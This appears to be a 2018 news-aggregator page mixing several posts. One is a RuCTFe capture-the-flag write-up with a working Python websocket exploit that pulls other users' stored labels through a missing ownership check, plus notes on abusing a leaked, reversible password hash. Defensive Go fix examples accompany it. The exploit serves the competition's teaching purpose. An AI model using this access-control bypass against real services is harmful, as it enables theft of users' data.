The MPAA is far from impressed though. In a freshly written paragraph, it notes that the new law is still insufficient.

The Hollywood group explains that under the proposed law it will remain legal for people to download or stream pirated content privately, while website blocking remains unavailable.

“The draft Copyright Act shows significant shortcomings and will not significantly improve copyright protection. The Swiss government has refused to introduce basic elements of internationally accepted anti-piracy legislation into Swiss law,” the MPAA writes.

“For instance, the government dropped any access blocking mechanisms from the draft. Instead of proposing a legal source requirement for private use, the draft cements the understanding that private use of illegal sources is permitted.”

It’s clear that Hollywood is not happy with how things are going in Switzerland, and it hopes that the US Government can help to steer things in the right direction.

Unless that happens, we might see the same text appear again in the years to come. Copied from an authorized source, of course.

A copy of the MPAA’s comments is available here (pdf).


17:42

Today in GPF History for Sunday, November 11, 2018 [General Protection Fault: The Comic Strip]

Colonel Barker contemplates how future generations will perceive his actions...

16:35

Christoph Egger: RuCTFe 2018 laberator [Planet Debian]

Team: FAUST
Crew: izibi, siccegge
CTF: RuCTFe 2018

The service

Webservice written in Go. Has some pretty standard functionality (register, login, store a string) with the logic somewhat dispersed between the main webserver in main.go, some stuff in the templates and the websockets endpoint in command_executor.go. Obviously you have to extract the strings ("labels") from the gameserver. Also the phrase stored when creating the account was used to store some more flags.

Client side authentication for labels

Gem from the viewLabel JavaScript function. For some reason the label's owner is checked client-side after the data was already returned to the client.


            let label = JSON.parse(e.data);
            if (label.Owner !== getLoginFromCookies()) {
                return;
            }

And indeed, the websocket view method checks for some valid session but doesn't concern itself with any further validation of access privileges. As long as you have any valid session and can figure out websockets you can get about any label you like.


        "view": func(ex *CommandExecutor, data []byte) ([]byte, error) {
                var viewData ViewData
                err := json.Unmarshal(data, &viewData)
                if err != nil {
                        return nil, createUnmarshallingError(err, data)
                }
                cookies := parseCookies(viewData.RawCookies)
                ok, _ := ex.sm.ValidateSession(cookies)
                if !ok {
                        return nil, errors.New("invalid session")
                }
                label, err := ex.dbApi.ViewLabel(viewData.LabelId)
                if err != nil {
                        return nil, errors.New(fmt.Sprintf("db request error: %v, labelId=(%v)", err.Error(), viewData.LabelId))
                }
                rawLabel, err := json.Marshal(*label)
                if err != nil {
                        return nil, errors.New(fmt.Sprintf("marshalling error: %v, label=(%v)", err.Error(), *label))
                }
                return rawLabel, nil
        },

Putting things together. The exploit builds a fresh account. It generates some label (to figure out the ID of the most recent labels) and then bulk loads the last 100 labels.

#!/usr/bin/env python3

import requests
import websocket
import json
import sys
import string
import random
import base64


def main():
    host = sys.argv[1]
    session = requests.session()

    password = [i for i in string.ascii_letters]
    random.shuffle(password)

    username = ''.join(password[:10])
    phrase = base64.b64encode((''.join(password[10:20])).encode()).decode()
    password = base64.b64encode((''.join(password[20:36])).encode()).decode()


    x = session.get('http://%s:8888/register?login=%s&phrase=%s&password=%s' %   
                    (host,username,phrase,password))
    x = session.get('http://%s:8888/login?login=%s&password=%s' % 
                    (host,username, password))
    raw_cookie = 'login=%s;sid=%s' % (x.cookies['login'], x.cookies['sid'])

    ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))

    data = {'Text': 'test', 'Font': 'Arial', 'Size': 20, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "create", "Data": json.dumps(data)}))
    # make sure create is already committed before continuing
    ws.recv()

    data = {'Offset': 0, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "list", "Data": json.dumps(data)}))
    stuff = json.loads(ws.recv())
    lastid = stuff[0]['ID']

    for i in range(0 if lastid-100 < 0 else lastid-100, lastid):
        ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))
        try:
            data = {'LabelId': i, 'RawCookies': raw_cookie}
            ws.send(json.dumps({"Command": "view", "Data": json.dumps(data)}))
            print(json.loads(ws.recv())["Text"])
        except Exception:
            pass


if __name__ == '__main__':
    main()

Password Hash

The hash module used is obviously suspect. It consists of a binary and a wrapper, freshly uploaded to GitHub just the day before. Also, if you create a test account with a short password (say, test) you end up with a hash that contains the password in plain (say, testTi\x02mH\x91\x96U\\I\x8a\xdd). Looking closer, if you register with a password that is exactly 16 characters (aaaaaaaaaaaaaaaa) you end up with a 16 character hash that is identical. This also means the password hash is a valid password for the account.

Listening to tcpdump for a while you'll notice interesting entries:

[{"ID":2,"Login":"test","PasswordHash":"dGVzdFRpAm1IkZZVXEmK3Q==","Phrase":{"ID":0,"Value":""}}]

See the password hash there? Turns out this comes from the regularly scheduled last_users websocket call.


        "last_users":  func(ex *CommandExecutor, _ []byte) ([]byte, error) {
                users := ex.dbApi.GetLastUsers()
                rawUsers, err := json.Marshal(*users)
                if err != nil {
                        return nil, errors.New(fmt.Sprintf("marshalling error: %v, users=(%v)", err.Error(), *users))
                }
                return rawUsers, nil
        },

So call last_users (doesn't even need a session), log in as each of the last 20 users and just load all the labels. Good thing passwords are transferred base64 encoded, so no worrying about non-printable characters in the password hash.
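The two handler problems above (view without an ownership check, last_users returning PasswordHash to anyone) have the same server-side fix. This is an added example, not code from the service or from the write-up: the field names follow the JSON shown on this page, while the Store type, the session map and all function names are hypothetical.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// Field names follow the JSON seen in the write-up; the Store type, the
// session map and every function name here are hypothetical.
type Label struct {
	ID    int
	Owner string
	Text  string
}

type User struct {
	ID           int
	Login        string
	PasswordHash string
}

// PublicUser is the only user shape allowed to leave the server.
type PublicUser struct {
	ID    int
	Login string
}

var (
	ErrNoSession = errors.New("invalid session")
	ErrForbidden = errors.New("label not available")
)

type Store struct {
	labels   map[int]Label
	users    []User
	sessions map[string]string // sid -> login, kept server-side
}

// loginFor resolves the caller from the server-side session table. The
// login cookie sent by the client is never trusted for this.
func (s *Store) loginFor(sid string) (string, error) {
	login, ok := s.sessions[sid]
	if !ok {
		return "", ErrNoSession
	}
	return login, nil
}

// ViewLabel returns a label only to its owner.
func (s *Store) ViewLabel(sid string, labelID int) ([]byte, error) {
	login, err := s.loginFor(sid)
	if err != nil {
		return nil, err
	}
	label, ok := s.labels[labelID]
	// One error for "missing" and "not yours", so IDs cannot be probed.
	if !ok || label.Owner != login {
		return nil, ErrForbidden
	}
	return json.Marshal(label)
}

// LastUsers requires a session and copies users into PublicUser, so the
// hash cannot be serialized even if User gains new fields later.
func (s *Store) LastUsers(sid string) ([]byte, error) {
	if _, err := s.loginFor(sid); err != nil {
		return nil, err
	}
	out := make([]PublicUser, 0, len(s.users))
	for _, u := range s.users {
		out = append(out, PublicUser{ID: u.ID, Login: u.Login})
	}
	return json.Marshal(out)
}

// demoStore holds constructed sample data.
func demoStore() *Store {
	return &Store{
		labels: map[int]Label{
			1: {ID: 1, Owner: "alice", Text: "alice-label"},
			2: {ID: 2, Owner: "bob", Text: "bob-label"},
		},
		users: []User{
			{ID: 1, Login: "alice", PasswordHash: "constructed-hash-a"},
			{ID: 2, Login: "bob", PasswordHash: "constructed-hash-b"},
		},
		sessions: map[string]string{"sid-alice": "alice", "sid-bob": "bob"},
	}
}

func main() {
	s := demoStore()
	_, err := s.ViewLabel("sid-bob", 1)
	fmt.Println("bob views alice's label:", err)
	own, _ := s.ViewLabel("sid-bob", 2)
	fmt.Println("bob views own label:", string(own))
	users, _ := s.LastUsers("sid-bob")
	fmt.Println("last_users:", string(users))
}
```
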

Additionally, sessions were generated with the broken hash implementation. This probably would have allowed computing session IDs.
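A small audit that flags the symptoms described under "Password Hash" (output embedding the password, identity on some input, and a stored hash that works as a password) before a hash routine is adopted. This is an added example, not code from the service or the write-up; paddedCopy is a constructed stand-in that only reproduces the behaviour observed above, and its filler byte and its truncation of longer inputs are assumptions.

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"fmt"
)

// HashFunc is the shape of a password-hashing routine under review.
type HashFunc func(password []byte) []byte

// auditHash feeds each sample password to h and returns the failure
// modes it observes, each reported once, in order of first occurrence.
func auditHash(h HashFunc, samples []string) []string {
	var findings []string
	seen := map[string]bool{}
	add := func(f string) {
		if !seen[f] {
			seen[f] = true
			findings = append(findings, f)
		}
	}
	for _, pw := range samples {
		in := []byte(pw)
		out := h(in)
		if bytes.Equal(out, in) {
			add("identity") // hash is the password itself
		} else if bytes.Contains(out, in) {
			add("embeds-input") // password readable inside the hash
		}
		// Login compares h(submitted) with the stored value. If h maps a
		// stored value to itself, a leaked hash logs in directly.
		if bytes.Equal(h(out), out) {
			add("hash-is-password")
		}
	}
	return findings
}

// paddedCopy is a constructed stand-in, not the module from the CTF. It
// copies the input into a 16-byte buffer pre-filled with a constant.
func paddedCopy(pw []byte) []byte {
	out := bytes.Repeat([]byte{0xA5}, 16)
	copy(out, pw)
	return out
}

// saltedSHA256 is a comparator that passes this audit. Passing is
// necessary, not sufficient: real password storage should use a
// dedicated password KDF (bcrypt, scrypt, Argon2) with per-user salts.
func saltedSHA256(pw []byte) []byte {
	sum := sha256.Sum256(append([]byte("constructed-salt:"), pw...))
	return sum[:]
}

func main() {
	// The two sample passwords are the ones used in the write-up.
	samples := []string{"test", "aaaaaaaaaaaaaaaa"}
	fmt.Println("paddedCopy:  ", auditHash(paddedCopy, samples))
	fmt.Println("saltedSHA256:", auditHash(saltedSHA256, samples))
}
```
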

15:42

Link [Scripting News]

Todo: List of likers should be reverse chronologic. Done.

Link [Scripting News]

We need to train huge numbers of Americans in the basics of journalism.

14:56

Link [Scripting News]

BTW, not every post has the Like option. I have to set an flLikeable attribute on the post to true in order for the Like to be generated by the JavaScript code that runs in the page.

Tweet chat with Om [Scripting News]

I just had a brief chat with Om on Twitter. Here's what I said.

  • I liked your post about the blogger who tells her story. I saw Matt Haughey post something the other day lamenting there weren't more bloggers. I responded that there aren't that many bloggers. We're different.
  • Then I thought, if this were an industry we would have a PR firm that made sure we were included in important discussions, about law, policy, society, culture.
  • It's one of the things that's wrong. We develop great stuff, then the pros come in, take it over, miss the point, and drive it in the wrong direction. Or forget the roots, or don't protect its openness.
  • It's so weird that I can't even get into the conversation about podcasting, something that I personally developed.

Security chips have not reduced US credit-card fraud [Cory Doctorow – Boing Boing]

The US credit card industry was a very late adopter of security chips, lagging the EU by a decade or so; when they did roll out chips, it was a shambolic affair, with many payment terminals still not using the chips, and almost no terminals requiring a PIN (and some require a PIN and a signature, giving rise to the curiously American security protocol of chip-and-PIN-and-swipe-and-sign).

The adoption of security chips has not slowed credit card fraud, either. 60,000,000 US credit cards were compromised in the past 12 months and 90% of those were chip-enabled. The majority of compromised cards were stolen by infected point-of-sale terminals. The US has the worst credit card security in the world.

The findings come from a Gemini Advisory report, which blames a "lack of chip compliance" in merchants for the rise.

Based on the proprietary Gemini Advisory telemetry data collected from various dark-web sources over several years, we have determined that in the past 12 months at least 60 million US cards were compromised. Of those, 75% or 45.8 million were CP records, likely compromised through card-sniffing and point-of-sale (POS) breaches of businesses such as Saks, Lord & Taylor, Jason’s Deli, Cheddar’s Scratch Kitchen, Forever 21, and Whole Foods. To break it down even further, 90% or 41.6 million of those records were EMV chip-enabled.

Furthermore, the shift in Card-Not-Present (CNP) fraud is becoming more evident with a 14% increase in payment cards compromised through e-commerce breaches in the past 12 months. Payment card data that was stolen from Orbitz, Ticketmaster, City of Goodyear, and British Airways represented only a small part of the 14.2 million CNP records posted for sale in the past 12 months.

Card Fraud on the Rise, Despite National EMV Adoption [Gemini Advisory]

Credit Card Chips Fail to Halt Fraud, Survey Says [Jeff John Roberts/Fortune]

(via /.)

14:14

Ritesh Raj Sarraf: Migrating from Drupal to Hugo [Planet Debian]

TL;DR: Migrating my website from Drupal 7 to Hugo

Jump directly to the end titled Migration to Hugo

Initial website

Looking back at my website’s history, the domain was first registered sometime in 2003. Back then, it was mostly a couple of html pages. Being (and still) a novice in web, my website was mostly on ideas from others. IIRC, for the bare html one, I took a lot of look wise details from Miss Garrels’ website.

First blog

My initial blog was self-hosted with a blogging software in PHP, named PivotX. The website for it still works, so hopefully the project is still alive. It was a pretty good tool for the purpose. Very lean and had support for data backends in both MySQL and flat files. The latter was important to me as I wanted to keep it simple.

Drupal

My first interaction with Drupal was with its WSOD. That was it until I revisited it when evaluating different FOSS web tools to build a community site for one of my previous employers.

Back then, we tried multiple tools: Jive, Joomla, Wordpress and many more. But finally, resorted to Drupal. The requirement was to have something which would filter content under nested categories. Then, of the many things tried, the only one which seemed to be able to do it was Drupal with its Taxonomy feature, along with a couple of community driven add-on modules.

We built it but there were other challenges. It was hard to find people who were good with Drupal. I remember to have interviewed around 10-15 people, who could take over the web portal and maintain it, and still not able to fill the position. Eventually, I ended up maintaining the portal by myself.

Migrating my website to Drupal

The easiest way to deal with the maintenance was to have one more live portal running Drupal. My website, which back then, had ambitious goals to also serve an online shopping cart, was the perfect candidate. So I migrated my website from PivotX to Drupal 6. Drupal had a nice RSS Import module which was able to pull in most of the content, except the comments on each article. I think that is more a limitation of RSS Feeds. But the only data import path I could find back then was to import content through RSS Feeds.

Initially, Drupal looked like a nice tool. Lots of features and a vibrant community made it very appealing. And I always desired to build some skills Hands-On (that’s how the job market likes it; irrespective of the skills, it is the hands-on that they evaluate) by using Drupal both, at the employer’s community portal and my personal website.

Little did I know that running/maintaining a website is one aspect; whereas extending it is another (mostly expensive) affair.

Drupal 7

That was the first blow. For a project serving as a platform, Drupal was a PITA when dealing with migrations. And it is not about migrations to a different platform. Rather an upgrade from one major release to another.

Having been using Debian for quite some time, this approach from Drupal brought back memories from the past, of when using Red Hat Linux and SuSE Linux distribution; where upgrades were not a common term, and every major release of the distribution people were mostly recommended to re-install.

Similar was the case with Drupal. Every major release, many (core) modules would be dropped. Many add-on modules would lose support. Neither the project nor the community around it, was helpful anymore.

But somehow, I eventually upgraded to Drupal 7. I did lose a lot of functionality. My nested taxonomy was gone and my themes were all broken. For the web novice that I am, it took me some time to fix those issues.

But the tipping point came in with Drupal 8. It took the pain to the next level repeating the same process of dropping modules and breaking functionalities; never did I hear much of backward compatibility on this platform.

Hugo

For quite some time I kept looking for a migration path away from Drupal 7. I did not care what it was as long as it was FOSS, and had an active community around it. The immediate first choice was WordPress. By this time, my web requirements had trimmed down. No more did I have outrageous ideas of building all solutions (Web, Blog, Cart) in a single platform. All I did was mostly blog and had a couple of basic pages.

The biggest problem was migration. WP has a module, that does migration. But, for whatever annoying reason, the free version of it would only pick 7 articles from the total. And it did not import comments. So the annoyance and my limitations with web technologies was still prone to with WP. This migration path did not enthuse me much: it was more like a Hindi idiom: आसमान से गिरे और खजूर में अटके

I also attempted Jekyll and Hugo. My limited initial attempts were disappointing. Jekyll had an import module, which IIRC did not work properly. Similar was the case with Hugo, which has a module listed on its migration page, drupal2hugo, which sets a disappointment in the beginning itself.

With nothing much left, I just kept postponing my (desperate) plans to migrate.

Migration to Hugo

Luckily, I was able to find some kind soul share migration scripts to help migrate from Drupal 7 to Hugo. Not everything could be migrated (I had to let go of comments) but not much was I in a position to wait more.

With very minimal changes to adapt it to my particular setup, I was able to migrate most of my content. Now, my website is running on markdown generated with Hugo. More than the tool, I am happy to have the data available in a much standard format.

If there’s one thing that I’m missing on my website, it is mostly the commenting system. I would love to have a simple way to accept user comments integrated into Hugo itself, which would just append those comments to their respective posts. Hopefully soon, when I have (some more) free time.

<?php
define('DRUPAL_ROOT', __DIR__);
include_once(DRUPAL_ROOT . '/includes/bootstrap.inc');
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
$nids = db_query('SELECT DISTINCT(nid) FROM {node}')
  ->fetchCol();
$nodes = node_load_multiple($nids);
foreach($nodes as $node) {
  $front_matter = array(
    'title' => $node->title,
    'date' => date('c', $node->created),
    'lastmod' => date('c', $node->changed),
    'draft' => 'false',
  );
  if (!empty($node->taxonomy_vocabulary_2[LANGUAGE_NONE])) {
    $tags = taxonomy_term_load_multiple(
      array_column(
        $node->taxonomy_vocabulary_2[LANGUAGE_NONE],
        'tid'
      )
    );
    $front_matter['tags'] = array_column($tags, 'name');
  }
  if (!empty($node->taxonomy_vocabulary_1[LANGUAGE_NONE])) {
    $cat = taxonomy_term_load_multiple(
      array_column(
        $node->taxonomy_vocabulary_1[LANGUAGE_NONE],
        'tid'
      )
    );
    $front_matter['categories'] = array_column($cat, 'name');
  }
  $path = drupal_get_path_alias('node/'.$node->nid);
  if ($path != 'node/'.$node->nid) {
    $front_matter['url'] = '/'.$path;
    $content_dir = explode('/', $path);
    $content_dir = end($content_dir);
  }
  else {
    $content_dir = $node->nid;
  }
  $content = json_encode(
    $front_matter,
    JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE
  );
  $content .= "\n\n";
  $tmp_file = '/tmp/node.html';
  file_put_contents($tmp_file, $node->body['fr'][0]['value']);
  $body = shell_exec('html2markdown '.$tmp_file);
  unlink($tmp_file);
  //$body = $node->body['fr'][0]['value'];
  $content .= $body;
  $dir_name = '/tmp/hugo/content/'.$node->type.'/'.$content_dir;
  mkdir($dir_name, 0777, true);
  file_put_contents($dir_name.'/index.md', $content);
}

Link [Scripting News]

A three-minute video demo of Like.

Link [Scripting News]

I changed the way the thumb works in Like. Now, when you click the thumb, it fills in, when you click it again it toggles to being open. It used to flip to down. This was confusing. Now it doesn't flip, it's always up. I think this feels better, burns fewer braincells.

Apple's new bootloader won't let you install GNU/Linux -- Updated [Cory Doctorow – Boing Boing]

Locking bootloaders with trusted computing is an important step towards protecting users from some of the most devastating malware attacks: by allowing the user to verify their computing environment, trusted computing can prevent compromises to operating systems and other low-level parts of their computer's operating environment.

But as with every security measure, there's a difference between "secure for the user" and "secure against the user." Bootloader protection that doesn't allow an owner to decide which signatures they trust is security against the user: security that prevents the user from overriding the manufacturer, and so allows the manufacturer to lock the user in.

Apple's latest bootloader protection, the controversial T2 chip, is a good example of this. The chip comes with a user-inaccessible root of trust that allows for the installation of Apple and Microsoft operating systems, but not GNU/Linux and other open and free alternatives.

There's no reason it has to be this way: Google's flagship Pixel Chromebooks come with hardware switches that can be activated during the bootup to allow their owners to change which signatures the system trusts (users can initialize these systems with passwords that prevent others from covertly altering the trusted root later). This gives users the best of both worlds: a system that, by default, protects them from malware, and, should the user choose, allows them to nominate parties other than Google to decide whom they trust.

To make things worse, publishing tools to allow for bootloader overrides is legally risky under section 1201 of the DMCA, which provides for 5 year prison sentences and $500,000 fines (for a first offense) for anyone who traffics in tools to override access controls for copyrighted works.

Update: After some doing, it's possible to install GNU/Linux by disabling boot security altogether, though some further tweaking is required. However, unlike with the Pixel, you can't manually install your own trusted signatures into the bootloading security process.

Apple's T2 documentation makes it clear and explicitly mentions Linux:

NOTE: There is currently no trust provided for the Microsoft Corporation UEFI CA 2011, which would allow verification of code signed by Microsoft partners. This UEFI CA is commonly used to verify the authenticity of bootloaders for other operating systems such as Linux variants.

In other words, until Apple decides to add this certificate or the T2 chip otherwise is cracked so it could be fully disabled or allowed to load arbitrary keys, good luck even being able to boot Linux distributions on the new Apple hardware.

Apple's New Hardware With The T2 Security Chip Will Currently Block Linux From Booting [Michael Larabel/Phoronix]

(via /.)

Oracle's bad faith with security researchers led to publication of a Virtualbox 0-day [Cory Doctorow – Boing Boing]

In the debate over "responsible disclosure," advocates for corporate power say that companies have to be able to decide who can reveal defects in their products and under which circumstances, lest bad actors reveal their bugs without giving them time to create and promulgate a patch.

But over and over again, this theory of corporate responsibility and security researcher intransigence falls apart. The reality is that the kinds of security researchers who want to report bugs (rather than using them to attack people) are primarily interested in improving security, and corporations that offer good-faith promises (and live up to them) can easily tempt researchers into coordinating their disclosures. When corporations threaten researchers or fail to act on their warnings, the result isn't silence -- it's uncoordinated disclosure, when a security researcher simply publishes their findings without warning the company first.

The latest example of this is Sergey Zelenyuk's publication of a "100% reliable" exploit against Virtualbox, Oracle's popular virtual machine software. The exploit allows attackers to puncture the virtual machine's sandbox and access the underlying system's files and processes.

Zelenyuk published the zero-day bug because of Oracle's long history of mistreatment of security researchers (including threatening customers with legal retaliation if they hire auditors to examine the software Oracle sold them), and its cavalier handling of bugs, including a 15-month lag between learning of a similar bug and issuing a patch.

It's a sobering reminder that the "responsible disclosure" debate isn't about under which circumstances researchers can go public; it's about whether they choose to trust a company before going public. Some people have tried to shift the debate by criminalizing disclosure without corporate approval, but in those circumstances, we see even less coordination: it's becoming increasingly common for security researchers who fear retaliation to anonymously post their findings to pastebin and similar sites.

The vulnerability has security researchers panicking because VirtualBox is one of the most popular VM applications used for day-to-day malware analysis and reverse engineering.

Many have expressed concerns that malware authors may embed the zero-day's exploit chain inside malware strains that will then be able to escape VirtualBox VMs and infect the researcher's main operating systems with malware, as payback.

Today's zero-day disclosure is also the second virtual machine escape that Zelenyuk has discovered affecting VirtualBox. He found and reported a similar issue in mid-2017, which Oracle took over 15 months to fix.

VirtualBox zero-day published by disgruntled researcher [Catalin Cimpanu/Zdnet]

(via /.)

Reminder: ousted California Republican Dana Rohrabacher is a filthy tenant from hell [Cory Doctorow – Boing Boing]

Dana Rohrabacher was an oddity: a Republican lawmaker sent from a Democratic stronghold to the California legislature (he's now out of a job).

Rohrabacher was a genuinely terrible lawmaker: in ten years, the Tea Party darling voted to hand the president all-pervasive, permanent, unchecked spying powers; claimed the neo-Nazi march in Charlottesville was a Democratic Party conspiracy; was tricked into screaming racist slurs by Sacha Baron Cohen; called the cops on a constituent who asked him persistent questions; etc.

But one thing you may not remember is that Rohrabacher, a man who claims to venerate private property rights above all others, rented a house in Orange County, changed the locks to deny the owner entry, then trashed the place, filling it with garbage, destroying the fixtures, furniture and appliances; cutting the phone lines; and leaving behind squirming maggots under the stove. The damage cost $28,500 to fix.

Then Rohrabacher sued his landlord for not refunding his security deposit.

In August, a year after he, his wife and their triplets left the disaster and stiffed Polyniak out of a week of due rent, the congressman hired a lawyer, Devon R. Lucas, to file a lawsuit in Orange County Superior Court. According to the complaint, Rohrabacher, who skipped all military service when he was eligible to fight in Vietnam and nowadays hails himself “a patriot,” thinks he and his wife are the victims in the dispute. He wants Polyniak—a soft-spoken construction subcontractor who honorably served in the U.S. Marines—to pay him $20,000 for not refunding his security deposit in a timely manner.

With a scheduled April 2014 court-management conference, the case doesn’t look close to a respectable resolution. Lucas has sent Polyniak more than 50 hostile letters, a tactic apparently designed to win a default by handing the ex-landlord ever-increasing legal bills. What expenses Rohrabacher is incurring, if any, in the battle are unknown. Lucas, who lists his law-office address as a Costa Mesa mail drop, did not respond to inquiries about whether he is providing the congressman free or discounted services.

In September, Polyniak filed a cross-complaint in court. That lawsuit alleges in part that the Rohrabachers “failed to perform their obligations under the lease and have breached the terms and conditions of the lease in numerous, material ways.” Among the breaches: The congressman—who’d quietly bought a $1 million home in another part of Costa Mesa—refused to provide a forwarding address for an extended period of time.

Dana Rohrabacher Is Dirty [R. Scott Moxley/OC Weekly]

Rohrabacher Comes Clean About Messy Housing Dispute [Warren Rojas/Rollcall]

(Thanks, Fipi Lele!)

11:28

Simply awake [Seth's Blog]

Not groggy, not zoned out, not hyper, merely awake.

Aware of what’s around us. Present. Seeing things clearly, hearing them as if for the first time.

How often are we lucky enough to be awake?

Mass media, social networks, marketers—they rarely help us become awake. They seek clicking, buying, fearful zombies instead.

The people we seek to serve, those that we’re trying to reach–in the rare moments when they’re awake, are we wasting that tiny slice of magic? Do we create fear or boredom or ennui in the short run merely because it’s easier for us?

Seeking a state of awake seems like a worthy quest. And when we find it, it’s worth cherishing.

10:21

An algorithm a day will keep the doctor at bay | David Mitchell [David Mitchell | The Guardian]

Government plans to exploit personal data to target individuals is a shabby way to spend NHS money

“In the UK, we are spending £97bn of public money on treating disease and only £8bn preventing it,” the health secretary Matt Hancock said last week. “You don’t have to be an economist to see those numbers don’t stack up.” But Matt Hancock actually is an economist, so how does he know? I suppose he might have canvassed the views of some non-economists, but I’m sceptical about how rigorous that survey can have been.

“Hi Chris, Linda…” (good to get a gender balance) “… have you got a second?” Hancock may have asked his aides. “Of course, minister.” “You did classics and history respectively, right?” “That’s right.” (Chris is doing all the talking – come on, Linda!) “Great, so we’re spending £97bn on treating disease and only £8bn preventing it. Can you see that those numbers don’t stack up?” “Oh yes, absolutely,” says Chris. “Yes indeed, minister,” adds Linda.

A computer can instruct people on how not to get ill ... the fact that there’ll hardly be any hospitals will be an added incentive!

08:49

Corel Wrongly Accuses Licensed User of Piracy, Disables Software Remotely [TorrentFreak]

While the majority of computing devices come with sophisticated operating systems installed, users will almost certainly need to buy additional software to meet their needs.

Open Source software can usually be obtained for free but millions of users opt for paid products that need to be licensed by the companies offering them.

Of course, piracy is a significant problem for the developers behind the majority of premium products. Most are available from torrent sites or file-hosting platforms, often arriving with a ‘crack’ that allows users to enjoy without paying.

Companies often have sophisticated systems to detect unlicensed products, sometimes with the reasonable aim of attempting to convert pirates into paying consumers. Earlier this year we reported on Corel’s efforts in this space after the company obtained a patent for a system which is able to offer an amnesty to illegal users via a popup.

“The amnesty offer may, for example, agree not to bring criminal charges in exchange for the user purchasing a legitimate copy of the product,” Corel’s patent reads.

“In this manner, the user of the pirated version is given the opportunity to purchase a legitimate copy which, if acted on, increases revenue for the manufacturer.”

While this is fair enough, what happens when it all goes wrong? Earlier this week, TorrentFreak was contacted by an angry Corel customer who was witnessing first hand what can happen when a piracy detection system blows a fuse.

“I am a valid and licensed user and Corel support has records of my license key and right to use this software on my work PC,” he told us.

Despite paying the company as required, he received the following popup instead.

Scary message from Corel

The message couldn’t be more clear. Corel states that the copy in use is illegal and as a result, its functionality has been severely limited. “All save, export and print features will be permanently disabled,” it warns.

According to Corel, all of these problems can be solved with a click of the blue “BUY A LEGAL COPY NOW” button, something that made our contact extremely angry.

“I get this extortion popup and threat to my means to make a living. I feel like Corel has hijacked my computer, my artwork and images and is preventing me from making a living just to sell another upgrade. This is wrong, and something needs to be done about his practice,” he told us.

It’s not surprising that the user was upset at Corel remotely disabling his software. Aside from having a valid license, his work ground to a halt. Initial emails back and forth had him messing around in his computer’s registry in an effort to fix the problem but all the time he was unable to carry on with his job.

“I have owned a licensed copy of Corel PrintShop Pro since 9/2016 and use it multiple times each day for work. I use it for editing and creating graphics and logos for customers that host events and in the medical field for patient wristbands at hospitals and clinics,” he told TF.

“These images are used to identify and even categorize different types of patients and attendees at events. At this time, I’m unable to meet the needs of my customers because I can’t save any new artwork for them. This has now gone on for more than 24 hours.”

Eventually, after lengthy email exchanges, the problem got fixed, albeit after Corel’s customer had been unable to use his software for an extended period. He says that the problem has left a bad taste in his mouth and wonders how many other people are getting the message and, crucially, whether less technical users are paying to have the anti-piracy message removed.

“I’m not sure how [the steps Corel took] corrected my license issue or if it just took me off the ‘hit list’ of victims of what I still feel was some kind of scam. Still no apology from Corel for the problems caused or the delays it forced on me,” he added.

TorrentFreak contacted Corel requesting information and received a response from Gerard Metrailler, EVP of Global Products, whose name is on the patent issued earlier this year.

“Our anti-piracy measures are designed specifically to protect our IP. And as part of this process, we offer an amnesty program on many of our products that gives users an easy way to purchase a legitimate version of our software at an affordable price,” Metrailler explained.

“Unfortunately, some users who believe they are running legitimate versions of our software are surprised to receive a notification that their license is invalid. In many of these cases, the products were purchased from online marketplaces, often at very low prices, and the users were not aware they were buying illegitimate software.

“It’s critical to note that customers should always purchase our software from authorized resellers or Corel directly,” he added.

Given comments on Corel’s forums about unlicensed resellers, early in the week TF checked with the user where he’d obtained his license. According to an original purchase receipt reviewed by TF, it was obtained from the company’s own online store and everything was in order.

Corel did, however, suggest that a customer could receive the anti-piracy warning in error and said any customers who believe they are affected should contact the company right away.

“[I]n the very rare event of a mis-identification, I can assure you that we will work quickly to get the issue corrected. We agree that even one customer affected by a mistake like this is one customer too many,” Metrailler said.

We asked Corel how many customers take them up on their offer of reduced price software as part of an amnesty but the company provided no details. We asked if there were any safeguards to prevent licensed users paying up in error but received no response.

Corel did, however, give TF a contact email address so that their customer can get directly in touch, and we’ve forwarded that to him. In the meantime, directly with the customer and independently of our discussions with him and the company, Corel support offered him a 5% discount on future purchases.

“I want to ask them if that 5% is good for Photoshop,” the customer commented dryly.

08:00

In a World of Their Own [George Monbiot]

By downplaying and misrepresenting our environmental crisis, David Attenborough and the BBC have generated complacency, confusion and ignorance.

By George Monbiot, published in the Guardian, 7th November 2018

Knowingly creating a false impression of the world: this is a serious matter. It is more serious still when the BBC does it, and yet worse when the presenter is “the most trusted man in Britain”. But, as his latest interview with the Observer reveals, Sir David Attenborough sticks to his line that fully representing environmental issues is a “turn-off”.

His new series, Dynasties, will mention the pressures affecting wildlife, but Attenborough makes it clear that it will play them down. To do otherwise, he suggests, would be “proselytising” and “alarmist”. His series will be “a great relief from the political landscape which otherwise dominates our thoughts.” In light of the astonishing rate of collapse of the animal populations he features, alongside most of the rest of the world’s living systems, and when broadcasting as a whole has disgracefully failed to represent such truths, I don’t think such escapism is appropriate or justifiable.

It is not proselytising or alarmist to tell us the raw truth about what is happening to the world, however much it might discomfit us. Nor do I believe that revealing the marvels of nature automatically translates into environmental action, as the executive producer of Dynasties claims. I’ve come to believe it can have the opposite effect.

For many years, wildlife film-making has presented a pristine living world. It has created an impression of security and abundance, even in places afflicted by cascading ecological collapse. The cameras reassure us that there are vast tracts of wilderness in which wildlife continues to thrive. They cultivate complacency, not action.

You cannot do such a thing passively. Wildlife filmmakers I know tell me that the effort to portray what looks like an untouched ecosystem becomes harder every year. They have to choose their camera angles ever more carefully to exclude the evidence of destruction, travel further to find the Edens they depict. They know, and many feel deeply uncomfortable about it, that they are telling a false story, creating a fairytale world which persuades us that all is well, in the midst of an existential crisis. While many people, thanks in large part to David Attenborough, are now quite well informed about wildlife, we remain astonishingly ignorant about what is happening to it.

What makes Attenborough’s comments particularly odd is that they come just a year after the final episode of his Blue Planet II series triggered a massive effort to reduce plastic pollution. Though the programme made a complete dog’s breakfast of the issue, the response demonstrated a vast public appetite for information about the environmental crisis, and an urgent desire to act on it.

